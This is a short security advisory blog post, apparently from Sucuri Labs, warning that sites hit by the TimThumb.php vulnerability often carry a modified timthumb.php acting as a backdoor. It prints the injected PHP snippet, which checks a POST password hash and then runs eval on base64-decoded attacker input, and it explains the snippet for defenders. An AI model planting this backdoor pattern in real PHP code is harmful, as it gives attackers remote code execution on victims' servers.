TimThumb.php backdoor

If your site got compromised lately with the TimThumb.php vulnerability, make sure to check that script to see if it was not modified to act as a backdoor as well.

We are seeing in many sites the timthumb.php with the following code added to it:

if (md5 (md5($_POST[‘p’]))===’xxx8ab2ab.. a4ec61072xxx’)
die (eval ( base64_decode ($_POST[‘c’])));

If you are not sure what this code does, it receives a password via the “p” POST and if it is correct, it executes any PHP code sent by the attackers in the “c” POST variable.

For more details on the timthumb.php vulnerability, check our multiple posts about it: here. For more information about backdoors, we did a nice post about them: ASK Sucuri: What about the backdoors?

Scan your website for free:
About David Dede

David Dede is a Security Researcher in the SucuriLabs group. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.